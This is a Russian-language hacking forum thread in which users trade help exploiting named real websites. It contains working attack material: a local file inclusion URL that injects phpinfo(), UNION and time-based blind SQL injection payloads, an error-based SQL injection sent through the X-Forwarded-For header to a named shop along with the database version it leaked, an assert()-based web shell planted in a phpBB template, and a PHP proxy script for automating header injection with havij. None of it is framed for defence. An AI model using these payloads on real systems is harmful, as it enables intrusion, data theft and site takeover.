Ваши вопросы по уязвимостям.

Если научится пользоваться поиском то найдем:

 

То что во-первых это не LFI, во вторых мозг не должен ограничиваться /proc/self/environ

 

Что это если не Local File Inclusion?

Этот скрипт используется для подгрузки элементов страницы с помощью JavaScript. Каким еще макаром программист стал бы делать это, кроме как с помощью include() или require()?

Кусок кода с главной страницы ресурса:

HTML:

loadPOPUP("load.php?index="+index+"&file=lib_current.popup.php", popup_id/*'popup'*/, index);

 

2 herfleisch

Все же LFI. Вот код твоего файлика =)))

PHP:

<?php
//загрузка файла из модуля
if (!$_GET['binary'])
    header('Content-Type: text/html; charset=windows-1251');
include "config.ini.php";
include_once $CONFIG['path']['library']."lib.database.inc.php";
include_once $CONFIG['path']['library']."lib.modules.php";

**закрытоцензурой**

if ($_GET['file'])
    include_once $_GET['file'];//загрузка файла
?>

 

В том что это LFI у меня сомнений не было, ибо

 

Добрый вечер уважаемые.
Помогите раскрутить

 

Code:

http://www.cnbest.ru/index.php?main=news&id=100116 and 0 union select 1,2,concat_ws(0x3a,user(),database(),version())-- -

 

Серьезно, это локальный инклюд. Моя ошибка.
http://teyla.ru/load.php?file=/proc/self/fd/9&xx=phpinfo();

 

Люди, не могу залить шелл через шаблоны, включил Разрешить php в шаблонах: ДА
Вставляю в шаблон faq_body.html такой код:
<!-- PHP -->
assert(stripslashes($_REQUEST[x]));
<!-- ENDPHP -->
0 Реакции.... Помогите плиз

И вообще когда я удаляю все содержимое шаблона, а потом просматриваю ничего на форуме не изменяется...
phpbb 3.0.10

 

Не тот шаблон редактировал, спасибо

 

Как можно автоматизировать sqli через X-Forwarded-For: ?

 

помогите найти ман по time based sql inj или покажите как крутить на примере http://www.exploit-db.com/exploits/18618/
буду рад любой помощи
вроде понял

 

Какой-нибудь плагин вроде tamper data.

 

Подскажите прогу/скрипт для брутфорса/дампинга blind time based mysql инъекций.

 

чем вас не устраивает sqlmap?!

 

слишком крутая прога для меня
по сути я не знаю как засунуть в нее скуль такого типа:
.ru/index.php/404' AND IF((SELECT ascii(substr(table_name,1,1)) FROM information_schema.tables WHERE table_schema=database() LIMIT 0,1)<200, sleep(2), null)-- '1
чтоб она подбирала названия таблиц и т.д.

 

Может знает кто как раскрутить

Code:

GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: "

 

PHP:

GET /ru/gaming-accessories/razer-rechargeble-lithium-ion-for-mamba-elit-naga-epic-star-wars-000010/index.html HTTP/1.1
Host: www.3ona51.com
X-Forwarded-For: 127.0.0.1", 19243580, 3, 71805)on duplicate key update a=(select 1 from(select count(*),mid(version(),rand(0)|0)x from information_schema.tables group by x)a)#

MySQL[1062]: Duplicate entry '5.5.13' for key 'group_key'

 

как првильно вставить в скрипт данные, чтобы получить такой результат?
<?php
echo '<b>IP:</b> ' . $_SERVER[REMOTE_ADDR].
'<br/><b>User-Agent:</b> ' . $_SERVER['HTTP_USER_AGENT'].
'<br/><b>X-Forwarded-For:</b> ' . $_SERVER['HTTP_X_FORWARDED_FOR'].
'<br/><b>X-Forwarded:</b> ' . $_SERVER['HTTP_X_FORWARDED'].
'<br/><b>Forwarded-for:</b> ' . $_SERVER['HTTP_FORWARDED_FOR'].
'<br/><b>Forwarded:</b> ' . $_SERVER['HTTP_FORWARDED'].
'<br/><b>Via:</b> ' . $_SERVER['HTTP_VIA'].
'';

echo "<h2>All headers</h2>";
echo "<pre>";
print_r($_SERVER);
echo "</pre>";
?>

 

Tamper Data облегчает процесс, но не автоматизирует его. Этим вполне может заняться связка havij + php:

PHP:

<?php
$sqli = $_GET['sqli'];
$packet = "GET /script.php HTTP/1.1
Host: victim.com
Connection: close
X-Forwarded-For: 127.0.0.$sqli
\n";

$fp = fsockopen("victim.com", "80");
fwrite($fp, $packet);
while (!feof($fp)) {
        $out .= fgets($fp, 1024);
}
fclose($fp);
echo $out;


Далее заливаем скрипт на локалхост и скармливаем havij'у ссылку

Проблема с SSL решается аналогично.

enjoy